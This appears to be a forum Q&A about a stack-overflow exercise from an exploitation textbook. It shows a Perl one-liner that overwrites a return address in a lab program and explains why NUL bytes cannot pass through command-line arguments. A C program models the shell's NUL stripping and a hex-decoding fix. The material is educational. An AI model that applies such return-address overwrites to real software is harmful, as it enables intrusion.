Reading the book "Hacking - The Art of Exploitation"; I am following the writer as he changes the execution flow by overflowing the stack and changing the return address of a function. (Specifically, page 135-136) He manages to do this with a Perl script, entering the return address as a command line argument 10 times:
$ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')
where 0x080484bf is the return address.
I'm trying to do the same, but my return address starts with 0x00. Replacing \x08 with \x00, the null character gets omitted, so the address I want to enter is shifted by a byte in the memory map. How can I work around this?
Command-line arguments are NUL-terminated strings. Therefore, you can't pass a string containing a NUL. It would be taken to be the end of the string.
$ perl -e'system("echo", "abc\x00def", "ghi\x00jkl");'
abc ghi
Knowing this, the shell is stripping out the NULs when building the argument.
$ perl -e'printf "%v02X\n", $_ for @ARGV' "$( perl -e'print "\xbf\x84\x04\x08" x 5' )"
BF.84.04.08.BF.84.04.08.BF.84.04.08.BF.84.04.08.BF.84.04.08
$ perl -e'printf "%v02X\n", $_ for @ARGV' "$( perl -e'print "\xbf\x84\x04\x00" x 5' )"
BF.84.04.BF.84.04.BF.84.04.BF.84.04.BF.84.04
auth_overflow2 should be modified to take an escaped form of the address, e.g. the address in hex.
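As an added example (not from the book, the question, or the answer), this C program models both halves of the answer: the shell dropping 0x00 bytes from the substituted argument (the BF.84.04 output above), and the suggested fix of passing the address hex-encoded and decoding it inside the program. The shell_strip_nuls and hex_decode names and the sample bytes are constructed for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of what the page's second transcript shows: command substitution drops
 * every 0x00 byte, so the bytes after a NUL slide down and the 4-byte address
 * loses its alignment. Returns the number of bytes that survive. */
size_t shell_strip_nuls(const unsigned char *in, size_t len,
                        unsigned char *out, size_t out_cap) {
    size_t n = 0;
    for (size_t i = 0; i < len && n < out_cap; i++) {
        if (in[i] != 0) out[n++] = in[i];
    }
    return n;
}

/* The fix the answer proposes: accept the address hex-encoded ("bf840400") and
 * decode it in-process. Returns bytes written, or 0 on odd length, bad digit or overflow. */
size_t hex_decode(const char *hex, unsigned char *out, size_t out_cap) {
    size_t n = strlen(hex);
    if (n == 0 || n % 2 != 0 || n / 2 > out_cap) return 0;
    for (size_t i = 0; i < n; i += 2) {
        unsigned char byte = 0;
        for (int k = 0; k < 2; k++) {
            char c = hex[i + k];
            unsigned char v;
            if (c >= '0' && c <= '9') v = (unsigned char)(c - '0');
            else if (c >= 'a' && c <= 'f') v = (unsigned char)(c - 'a' + 10);
            else if (c >= 'A' && c <= 'F') v = (unsigned char)(c - 'A' + 10);
            else return 0;
            byte = (unsigned char)((byte << 4) | v);
        }
        out[i / 2] = byte;
    }
    return n / 2;
}

int main(void) {
    /* Constructed input: the page's little-endian address with a 0x00 high
     * byte, repeated five times as the Perl one-liner does. */
    unsigned char addr[4] = {0xbf, 0x84, 0x04, 0x00};
    unsigned char repeated[20], kept[20], decoded[4];
    for (int i = 0; i < 5; i++) memcpy(repeated + 4 * i, addr, 4);
    size_t n = shell_strip_nuls(repeated, sizeof repeated, kept, sizeof kept);
    printf("%zu of 20 bytes survive the shell; 4-byte alignment lost\n", n);
    size_t m = hex_decode("bf840400", decoded, sizeof decoded);
    printf("hex_decode gives %zu bytes, last is 0x%02x\n", m, decoded[3]);
    return 0;
}
```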